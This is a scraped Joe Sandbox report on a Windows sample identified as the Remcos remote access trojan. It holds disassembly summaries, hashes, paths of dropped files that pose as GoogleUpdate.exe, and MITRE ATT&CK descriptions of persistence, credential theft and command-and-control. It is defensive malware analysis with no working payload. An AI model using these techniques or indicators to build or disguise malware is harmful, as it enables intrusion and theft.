Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5

Function 00433038 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044

Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83

__CxxThrowException@8.LIBVCRUNTIME ref: 00433052

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433038

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5

Function 0044C4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0044C4EA
GetCommandLineW.KERNEL32 ref: 0044C4F5

Strings

5g, xrefs: 0044C4F0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 5g
API String ID: 3253501508-2513871569
Opcode ID: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
Instruction ID: ed7793de650037ca68a065bd14f32765b676cca72e00cc30cceafd45c2a83d08
Opcode Fuzzy Hash: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
Instruction Fuzzy Hash: A8B092788007008FCB108FB0B80C0143BA0B6182073C15176DC8EC3F22E7758008DF09

Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
GetLastError.KERNEL32 ref: 0043B4E9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799

Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DB5rQYsfd6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\GoogleDat\GoogleUpdate.exe

C:\ProgramData\GoogleDat\GoogleUpdate.exe:Zone.Identifier

C:\ProgramData\bootdata\logs.dat

C:\Users\user\AppData\Local\Temp\install.vbs

Static File Info

General

File Icon

Windows Analysis Report
DB5rQYsfd6.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre